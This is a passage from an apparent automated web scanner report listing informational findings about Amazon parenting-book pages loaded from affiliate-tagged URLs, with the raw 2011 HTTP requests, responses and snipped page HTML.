<img src="http://ecx.images-amazon.com/images/I/51CqnjvjUaL._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg" style="display:none;"/>
</div>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tl._V192253278_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableTop"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tr._V192253274_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<td class="subsDPTableLeft"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td class="subsDPTableRight"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-bl._V192199724_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableBottom"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-br._V192253272_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<a href="https://www.amazon.com/gp/tradein/add-to-cart.html/ref=trade_new_dp_trade_btn?ie=UTF8&asin=0313363153"><img src="http://g-ecx.images-amazon.com/images/G/01/tradein/buttons/button_tradein_here._V192193387_.gif" width="84" align="absmiddle" height="17" border="0" /></a>
...[SNIP]...
<a href="/gp/reader/0313363153/ref=sib_dp_pt#reader-link" onclick="if (typeof(SitbReader) != 'undefined') { SitbReader.LightboxActions.openReader('sib_dp_pt'); return false; }"><img onload="if (typeof uet == 'function') { uet('af'); }" src="http://ecx.images-amazon.com/images/I/51CqnjvjUaL._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg" id="prodImage" width="300" height="300" onMouseOver="sitb_showLayer('bookpopover'); return false;" onMouseOut="sitb_doHide('bookpopover'); return false;" border="0" alt="Breaking Free, Starting Over: Parenting in the Aftermath of Family Violence" onmouseover="" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Breaking-Free-Starting-Over-Parenting/dp/0313363153/ref=pd_bxgy_b_img_a"><img src="http://ecx.images-amazon.com/images/I/51CqnjvjUaL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg" width="75" alt="Breaking Free, Starting Over: Parenting in the Aftermath of Family Violence" id="bxgy_img_a" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/When-Dad-Hurts-Mom-Witnessing/dp/0425200310/ref=pd_bxgy_b_img_b"><img src="http://ecx.images-amazon.com/images/I/51ORZtvZaBL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="75" alt="When Dad Hurts Mom: Helping Your Children Heal the Wounds of Witnessing Abuse" id="bxgy_img_b" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Why-Does-He-That-Controlling/dp/0425191656/ref=pd_bxgy_b_img_c"><img src="http://ecx.images-amazon.com/images/I/51KP97slJ7L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="75" alt="Why Does He Do That?: Inside the Minds of Angry and Controlling Men" id="bxgy_img_c" height="75" border="0" /></a>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51ORZtvZaBL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51KP97slJ7L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/415RG3wyr9L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41m7wQTxoDL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/5149K3WJ6FL._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51ttkM3voAL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div style="display: none" class="CustomerPopover_load"><img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-label._V192195535_.gif" width="73" alt="Loading&hellip;" height="14" border="0" /></div>
...[SNIP]...
<noscript>
<link type="text/css" rel="stylesheet" href="http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css" />
</noscript>
...[SNIP]...
</div>

<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/cfm._V192249942_.gif" width="1" alt="" onload="if (typeof uet == 'function') { uet('cf'); }" height="1" border="0" />

<br />
...[SNIP]...
<div style="display:none;" id="cg-div">
<img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" /><img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" />
</div>
...[SNIP]...
<div class="s9DpEntity" id="s9DpEntity" style="height: 200px;"><img style='padding-left: 130px; padding-top: 20px;' src='http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195483_.gif' alt='loading' /><noscript>
...[SNIP]...
</ul><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/orange-arrow._V192240581_.gif" width="10" height="9" border="0" />


<a href="http://www.amazon.com/Breaking-Free-Starting-Over-Parenting/dp/book-citations/0313363153/ref=sid_dp_av/188-3368164-3583051?ie=UTF8&citeType=citing#citing">
...[SNIP]...
<td valign="top" class="faceout"><img src="http://ecx.images-amazon.com/images/I/51CqnjvjUaL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg" width="50" alt="Breaking Free, Starting Over: Parenting in the Aftermath of Family Violence" height="50" border="0" /></td>
...[SNIP]...
<a href="http://www.amazon.com/Terrible-Thing-Happened-children-witnessed/dp/1557987017/ref=pd_cp_b_1_img" id="pd_cp_b_1_img_1557987017" ><img src="http://ecx.images-amazon.com/images/I/5149K3WJ6FL._SL75_SS50_.jpg" width="50" alt="A Terrible Thing Happened - A story for children who have witnessed violence or trauma" height="50" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Why-Does-He-That-Controlling/dp/0425191656/ref=pd_cp_b_2_img" id="pd_cp_b_2_img_0425191656" ><img src="http://ecx.images-amazon.com/images/I/51KP97slJ7L._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="Why Does He Do That?: Inside the Minds of Angry and Controlling Men" height="50" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/When-Dad-Hurts-Mom-Witnessing/dp/0425200310/ref=pd_cp_b_3_img" id="pd_cp_b_3_img_0425200310" ><img src="http://ecx.images-amazon.com/images/I/51ORZtvZaBL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="When Dad Hurts Mom: Helping Your Children Heal the Wounds of Witnessing Abuse" height="50" border="0" /></a>
...[SNIP]...
<div class="loading_ind" style="text-align: center; width: 100%; display: none;">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif" width="100" alt="Loading..." height="124" border="0" />
</div>
...[SNIP]...
<div class="loading_ind" style="display:none" width="100%">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195480_.gif" style="padding:8px 0px 0px 100px" />
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div style="text-align:center; padding-bottom:px;"><img src="http://g-ecx.images-amazon.com/images/G/01/gateway/iab/advertisement-sm-head._V192575712_.gif" border="0" alt="Ad" /></div>
<iframe id="cachebust_43448"
name="cachebust_78966"
src="http://ace.advertising.com/site=739494/bnum=85665492/size=728090/tags=1/optn=1;ord=75418?"
title="Ad"
frameborder ="0"
scrolling ="no"
marginheight ="0"
marginwidth ="0"
topmargin ="0"
leftmargin ="0"
allowtransparency="true"
width ="730"
height ="92"
>
<a href="http://www.amazon.com/grocery-breakfast-foods-snacks-organic/b/?ie=UTF8&node=16310101" target="_blank"><img border="0" src="http://g-ecx.images-amazon.com/images/G/01/advertising/banners/grocery_728x90._V192205351_.gif" /></a>
...[SNIP]...
<div style="background-color:#eff7fe;border:1px solid #0f3c6d;padding:10px;text-align:left;" class="small">
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reputation/suggestionbox._V192249929_.gif" width="1" align="left" height="1" border="0" />
<div name="hmdFormDiv" id="hmdFormDiv">
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />
    If you need help or have a question for Customer Service, <a href="/gp/help/customer/display.html/ref=cm_r8n_hmd_contact?ie=UTF8&amp;nodeId=518316">
...[SNIP]...
<td>
           
   
                                                               <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />&nbsp;Would you like to <b>
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />

Is there any other feedback you would like to provide?


    <b>
...[SNIP]...
<a href="/ref=footer_logo/188-3368164-3583051"><img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif" width="126" alt="amazon.com" height="24" border="0" /></a>
...[SNIP]...
<div class="navFooterLine navFooterLinkLine navFooterPadItemLine">
<a href="http://www.amazon.ca">Canada</a>
<a href="http://www.amazon.cn">China</a>
<a href="http://www.amazon.fr">France</a>
<a href="http://www.amazon.de">Germany</a>
<a href="http://www.amazon.it">Italy</a>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.audible.com">Audible<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.dpreview.com">DPReview<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.endless.com">Endless<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.fabric.com">Fabric<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.imdb.com">IMDb<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.shopbop.com/welcome">Shopbop<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.smallparts.com">Small Parts<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.warehousedeals.com">Warehouse Deals<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.woot.com">Woot<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.zappos.com">Zappos<br/>
...[SNIP]...

20.548. http://www.amazon.com/dp/0814410960

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amazon.com
Path:   /dp/0814410960

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.amazon.com/dp/0814410960?tag=parenthoodcom-20&camp=211493&creative=379981&linkCode=op1&creativeASIN=0814410960&adid=1E43GGA9XAJKCAEXAPNZ&
The response contains the following links to other domains:

Request

GET /dp/0814410960?tag=parenthoodcom-20&camp=211493&creative=379981&linkCode=op1&creativeASIN=0814410960&adid=1E43GGA9XAJKCAEXAPNZ& HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:05:30 GMT
Server: Server
x-amz-id-1: 0V1X9WNQCM47PDADFQGC
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: SKWOpw071+vUvE/zvz84QekiVG202hXgMiv2MgQFljVkajAJe9OwpyfODLjeHTmR
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=176-7210136-6598218; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=y3NkdEGeLcNmXCUiBl72zia0IgOUlzJisM6ejtj6++wAzjFW+0MbDLrBrMTYId5ScAAIGSpPr8ov4wvfMrz16qkoExEE846LElBHdCDq1wJ5G3PyH/8+t8ULEiTMRJzZ+/UmohvS0s1wbtQLhB5tRJaj+v9Qvdikv5wA8Z+9BSaQuNwa25tYVL3brZaSaxoPnkAsz7sFby/Vm3IEdAyCOCgmDlA7LSKWp7BGexnTvAm3XJETeqxNVJ4XDLyzD9mn489zuGO7Hr1Q5jDtdTkD7MsDhmN6H6NA+BAMoVhXzdj8ywD6RaU+CKSyhgSibHDJfiAf99mXgDVIui4kc0MR8MKRTBSKmuzQBaMCl0Pf98laS7P8B1wibfy99GA8Gxn4ZYxd9IYn+0IOEpAUVtWvSy3VhH2tV4F6FYuFOflVaV1k+o8nZAdjmsVsH/6mMkOtJfcsZt8CR0o=; path=/; domain=.amazon.com; expires=Tue Feb 01 14:05:31 2011 GMT
Content-Length: 398021


<html>
<head>


<style type="text/css"><!--


BODY { font-
...[SNIP]...
</style>


                <link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/browser-scripts/fruitCSS/US-combined-1434113735.css._V175075384_.css" />


<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/dpCSS/US/combined-3484246616._V196377856_.css" />


<noscript><link type="text/css" rel="stylesheet" href="http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css" /></noscript>

<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/kitchen/scheduled-delivery/sd_style-v1.1.1.0._V200598425_.css"/>


<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/browser-scripts/accessoriesCSS/US-combined-2965960588.css._V172139020_.css" />


   <link rel="stylesheet" type="text/css" href=http://z-ecx.images-amazon.com/images/G/01/productAds/css/detailPageStatic._V175408788_.css />

<style type="text/css">
...[SNIP]...
</style>


<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-5791285623.css._V173906657_.css' rel='stylesheet'>
<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-4._V196325517_.css' rel='stylesheet'>
<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/browser-scripts/dpMergedOverallCSS/dpMergedOverallCSS-8314507502.css._V196183329_.css' rel='stylesheet'>
<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/ciuCSS/ciuCSS-ciuAnnotations-155.css._V174809499_.css' rel='stylesheet'>
<style type="text/css">
...[SNIP]...
</title>

<link title="Amazon Search Suggestions" rel="search" type="application/opensearchdescription+xml" href="http://d2lo25i6d3q8zm.cloudfront.net/browser-plugins/AmazonSearchSuggestionsOSD.DPIE.xml">


<!--[if IE]>
...[SNIP]...
</script>
<img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/orangeBlue/navPackedSprites-US-16._V212310439_.png" style="display:none" alt=""/>
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" style="display:none" alt=""/>


<!--Pilu -->
...[SNIP]...
<div id="rwImages_hidden" style="display:none;">
<img src="http://ecx.images-amazon.com/images/I/512RttCMV1L._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg" style="display:none;"/>
</div>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tl._V192253278_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableTop"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tr._V192253274_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<td class="subsDPTableLeft"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td class="subsDPTableRight"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-bl._V192199724_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableBottom"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-br._V192253272_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<td class="bottomLeft">
<img src="http://g-ecx.images-amazon.com/images/G/01/kindle/cascade/read-first-chapter-free._V201174422_.png" id="kindleReaderSampleButton" style="cursor:pointer"/>
</td>
...[SNIP]...
<a href="https://www.amazon.com/gp/tradein/add-to-cart.html/ref=trade_new_dp_trade_btn?ie=UTF8&asin=0814410960"><img src="http://g-ecx.images-amazon.com/images/G/01/tradein/buttons/button_tradein_here._V192193387_.gif" width="84" align="absmiddle" height="17" border="0" /></a>
...[SNIP]...
<a href="/gp/reader/0814410960/ref=sib_dp_pt#reader-link" onclick="if (typeof(SitbReader) != 'undefined') { SitbReader.LightboxActions.openReader('sib_dp_pt'); return false; }"><img onload="if (typeof uet == 'function') { uet('af'); }" src="http://ecx.images-amazon.com/images/I/512RttCMV1L._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg" id="prodImage" width="300" height="300" onMouseOver="sitb_showLayer('bookpopover'); return false;" onMouseOut="sitb_doHide('bookpopover'); return false;" border="0" alt="Raising Freethinkers: A Practical Guide for Parenting Beyond Belief" onmouseover="" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Raising-Freethinkers-Practical-Parenting-Beyond/dp/0814410960/ref=pd_bxgy_b_img_a"><img src="http://ecx.images-amazon.com/images/I/512RttCMV1L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg" width="75" alt="Raising Freethinkers: A Practical Guide for Parenting Beyond Belief" id="bxgy_img_a" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Parenting-Beyond-Belief-Raising-Religion/dp/0814474268/ref=pd_bxgy_b_img_b"><img src="http://ecx.images-amazon.com/images/I/41VzeG%2Bq0CL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="75" alt="Parenting Beyond Belief: On Raising Ethical, Caring Kids Without Religion" id="bxgy_img_b" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Maybe-Yes-No-Guide-Skeptics/dp/0879756071/ref=pd_bxgy_b_img_c"><img src="http://ecx.images-amazon.com/images/I/51SlYPTRa2L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="75" alt="Maybe Yes, Maybe No: A Guide for Young Skeptics" id="bxgy_img_c" height="75" border="0" /></a>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41VzeG%2Bq0CL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51SlYPTRa2L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/61RRhCgjqAL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51hNllGN8uL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51F1Xkl8lkL._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51DHWOul20L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div style="display: none" class="CustomerPopover_load"><img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-label._V192195535_.gif" width="73" alt="Loading&hellip;" height="14" border="0" /></div>
...[SNIP]...
<noscript>
<link type="text/css" rel="stylesheet" href="http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css" />
</noscript>
...[SNIP]...
</div>

<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/cfm._V192249942_.gif" width="1" alt="" onload="if (typeof uet == 'function') { uet('cf'); }" height="1" border="0" />

<br />
...[SNIP]...
<div style="display:none;" id="cg-div">
<img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" /><img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" />
</div>
...[SNIP]...
<div class="s9DpEntity" id="s9DpEntity" style="height: 200px;"><img style='padding-left: 130px; padding-top: 20px;' src='http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195483_.gif' alt='loading' /><noscript>
...[SNIP]...
<td valign="top" class="faceout"><img src="http://ecx.images-amazon.com/images/I/512RttCMV1L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg" width="50" alt="Raising Freethinkers: A Practical Guide for Parenting Beyond Belief" height="50" border="0" /></td>
...[SNIP]...
<a href="http://www.amazon.com/Parenting-Beyond-Belief-Raising-Religion/dp/0814474268/ref=pd_cp_b_1_img" id="pd_cp_b_1_img_0814474268" ><img src="http://ecx.images-amazon.com/images/I/41VzeG%2Bq0CL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="Parenting Beyond Belief: On Raising Ethical, Caring Kids Without Religion" height="50" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/One-World-Many-Religions-Worship/dp/0679839305/ref=pd_cp_b_2_img" id="pd_cp_b_2_img_0679839305" ><img src="http://ecx.images-amazon.com/images/I/51hNllGN8uL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="One World, Many Religions: The Ways We Worship" height="50" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Our-Family-Tree-Evolution-Story/dp/0152017720/ref=pd_cp_b_3_img" id="pd_cp_b_3_img_0152017720" ><img src="http://ecx.images-amazon.com/images/I/61RRhCgjqAL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="Our Family Tree: An Evolution Story" height="50" border="0" /></a>
...[SNIP]...
<div class="loading_ind" style="text-align: center; width: 100%; display: none;">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif" width="100" alt="Loading..." height="124" border="0" />
</div>
...[SNIP]...
<div class="loading_ind" style="display:none" width="100%">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195480_.gif" style="padding:8px 0px 0px 100px" />
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div style="background-color:#eff7fe;border:1px solid #0f3c6d;padding:10px;text-align:left;" class="small">
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reputation/suggestionbox._V192249929_.gif" width="1" align="left" height="1" border="0" />
<div name="hmdFormDiv" id="hmdFormDiv">
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />
    If you need help or have a question for Customer Service, <a href="/gp/help/customer/display.html/ref=cm_r8n_hmd_contact?ie=UTF8&amp;nodeId=518316">
...[SNIP]...
<td>
           
   
                                                               <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />&nbsp;Would you like to <b>
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />

Is there any other feedback you would like to provide?


    <b>
...[SNIP]...
<a href="/ref=footer_logo/176-7210136-6598218"><img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif" width="126" alt="amazon.com" height="24" border="0" /></a>
...[SNIP]...
<div class="navFooterLine navFooterLinkLine navFooterPadItemLine">
<a href="http://www.amazon.ca">Canada</a>
<a href="http://www.amazon.cn">China</a>
<a href="http://www.amazon.fr">France</a>
<a href="http://www.amazon.de">Germany</a>
<a href="http://www.amazon.it">Italy</a>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.audible.com">Audible<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.dpreview.com">DPReview<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.endless.com">Endless<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.fabric.com">Fabric<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.imdb.com">IMDb<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.shopbop.com/welcome">Shopbop<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.smallparts.com">Small Parts<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.warehousedeals.com">Warehouse Deals<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.woot.com">Woot<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.zappos.com">Zappos<br/>
...[SNIP]...

20.549. http://www.amazon.com/dp/B000EFAO1G

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amazon.com
Path:   /dp/B000EFAO1G

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.amazon.com/dp/B000EFAO1G?tag=parenthoodcom-20&camp=211493&creative=379969&linkCode=op1&creativeASIN=B000EFAO1G&adid=0GZGV3PX406SYA9DGF7Q&
The response contains the following links to other domains:

Request

GET /dp/B000EFAO1G?tag=parenthoodcom-20&camp=211493&creative=379969&linkCode=op1&creativeASIN=B000EFAO1G&adid=0GZGV3PX406SYA9DGF7Q& HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:04:26 GMT
Server: Server
x-amz-id-1: 09N75F9VXRTTHCJ6W4N0
